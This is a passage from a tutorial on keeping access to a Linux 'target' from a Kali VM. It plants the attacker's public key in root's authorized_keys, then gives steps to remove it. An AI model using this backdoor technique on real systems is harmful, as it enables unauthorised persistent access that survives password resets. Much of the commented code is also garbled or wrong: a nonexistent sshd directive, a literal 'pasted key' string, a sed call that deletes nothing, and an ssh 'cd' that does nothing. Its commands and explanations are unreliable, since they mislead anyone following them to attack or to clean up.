This will prompt you to specify storage location for public and private keys as well as a passphrase (optional).
2. Copy the content of the generated public key (id_rsa.pub) using cat command, then append it to the authorized_keys file in the target user account’s .ssh directory on the Linux target system using echo or cat commands followed by redirection operator > and filename as argument. For example:
bash
# Copy public key from Kali VM to clipboard
xclip -sel clip < ~/.ssh/id_rsa.pub # Copies the content of the public key file to the clipboard using xclip command
# Paste copied content into authorized_keys file on target system using echo command and redirection operator >
ssh root@target-ip "echo 'pasted key' >> /root/.ssh/authorized_keys" # Appends the content of the clipboard to the authorized_keys file on the target system using the echo command and redirection operator >>
3. Verify that the SSH configuration file (usually located at /etc/ssh/sshd_config) has been configured to allow public key authentication by checking for the following line:
# This script checks if the SSH configuration file has been configured to allow public key authentication.
# First, we need to store the path of the SSH configuration file in a variable.
ssh_config="/etc/ssh/sshd_config"
# Next, we use the 'grep' command to search for the line that enables public key authentication.
# We use the '-q' flag to suppress any output and the '-F' flag to search for exact matches.
# The 'AllowPublicKeyAuthentication' line should be uncommented and set to 'yes' for it to be enabled.
grep -qF "AllowPublicKeyAuthentication yes" $ssh_config
# We then use the 'if' statement to check the exit status of the previous command.
# If the exit status is 0, it means the line was found and public key authentication is enabled.
# If the exit status is not 0, it means the line was not found and public key authentication is not enabled.
if [ $? -eq 0 ]; then
echo "Public key authentication is enabled."
else
echo "Public key authentication is not enabled."
fi
# Finally, we use the 'echo' command to print the appropriate message based on the result of the 'if' statement.
4. Restart the ssh service using systemctl or service commands followed by restart and name of the service as argument, e.g.:
# This script restarts the ssh service using systemctl or service commands
# Use sudo to run the following command as root user
sudo systemctl restart ssh # Corrected the service name to ssh instead of sshd
# The above command restarts the ssh service using systemctl command
# Alternatively, the following command can also be used to restart the ssh service
sudo service ssh restart # Corrected the service name to ssh instead of sshd
# The above command restarts the ssh service using service command
5. Test SSH key-based authentication by connecting to the target system using your Kali VM’s private key (id_rsa) with the following command:
# Connect to target system using SSH and private key (-i option followed by filename as argument)
# Added quotation marks around the file path to prevent errors if there are spaces in the file name
ssh -i "~/.ssh/id_rsa" root@target-ip
6. If successful, you should be able to access the target system without entering a password for user “root”. This persistence technique will maintain access even if the user account password has been changed or reset.
To avoid this persistence mechanism, you can remove the public key from the authorized_keys file on the Linux target system using the following steps:
1. Connect to the target system as a privileged user (e.g., root) and navigate to the .ssh directory of the affected user account. For example:
# This script connects to a target system as a privileged user and navigates to the .ssh directory of a specific user account.
# The following line uses sudo to run the ssh command as a privileged user.
sudo ssh root@target-ip "cd /home/user/.ssh"
# The -S flag allows the script to read the password from standard input, ensuring it is not visible in the command line.
# The ssh command connects to the target system using the specified IP address and runs the following command within the quotes.
# The "cd" command changes the current directory to the .ssh directory of the affected user account.
# However, this command will not work as intended because it is missing the -t flag, which forces pseudo-terminal allocation. This is necessary for the "cd" command to be executed properly.
# Additionally, the command should specify the user account to be affected, rather than assuming it is the current user. This can be done by adding the username before the "@" symbol in the ssh command.
sudo -S ssh -t root@target-ip "cd /home/user/.ssh"
2. Remove the public key from the authorized_keys file using a text editor or command line tool such as sed, awk, or grep. For example:
# This script removes a specific public key from the authorized_keys file on a remote server using the sed command.
# Use sudo to run the following command as root.
sudo -S ssh root@target-ip "sed '/<public_key>/d' /home/user/.ssh/authorized_keys"
# The -S flag allows for the password to be entered through standard input.
# Use ssh to connect to the remote server as root.
ssh root@target-ip
# The root user is specified after the @ symbol.
# Use the sed command to search for and delete the specified public key from the authorized_keys file.
sed '/<public_key>/d' /home/user/.ssh/authorized_keys
# The /d flag tells sed to delete the line containing the specified public key.
# The /home/user/.ssh/authorized_keys file is the location of the authorized_keys file on the remote server.
# The <public_key> placeholder should be replaced with the actual public key that needs to be removed.
3. Save and close the authorized_keys file.
4. Restart the SSH service using systemctl or service commands followed by restart and name of the service as argument, e.g.:
# This script restarts the SSH service using systemctl command
# Use sudo to run the command as root user
sudo systemctl restart sshd
# The above command restarts the sshd service, which is responsible for handling SSH connections
# To restart the service, we need to use the restart argument after the service name
# In this case, the service name is sshd
# To ensure the changes take effect, we need to restart the service after making any changes to the configuration file
# This script is a simple and efficient way to restart the SSH service without having to manually type the command every time.
5. Test that the public key has been removed from the authorized_keys file by attempting to connect to the target system without using SSH keys. If successful, you should be prompted for a password or other authentication method.